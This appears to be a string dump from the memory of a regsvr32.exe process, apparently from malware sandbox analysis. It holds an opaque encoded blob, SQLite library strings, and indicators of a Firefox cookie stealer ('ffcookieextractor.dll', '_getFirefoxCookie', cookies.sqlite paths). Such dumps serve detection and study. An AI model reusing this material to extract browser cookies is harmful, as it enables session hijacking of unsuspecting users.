qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1  qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa  MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85  Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666

regsvr32.exe_3384_rwx_009B0000_0006C000:

<1%u3
t8It.IIt#
.FGyO
FTPj
YPSSSh
9t$Lt.VV
,4,56,789
GetProcessWindowStation
3.7.13
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-echo print commands before execution
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
HttpOnly=YES
HttpOnly=NO
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: %s
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
Error: non-null separator required for import
SELECT * FROM %s
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
iskeyword
ambiguous option name: "%s"
Error: invalid testctrl option: %s
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
%s %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s/.sqliterc
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
sqlite>
SQLite header and source version mismatch
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s/.sqlite_history
SQLite version %s %.19s
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
zcÁ
%System%\regsvr32.exe
GetCPInfo
]<%XkG
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ole32.dll
ffcookieextractor.dll
_getFirefoxCookie
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
888816666554443
6666554443
!6666554443
%AppData%\Mozilla\Firefox
\profiles.ini
\cookies.sqlite
Kernel32.dll

regsvr32.exe_3384_rwx_01000000_00005000:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
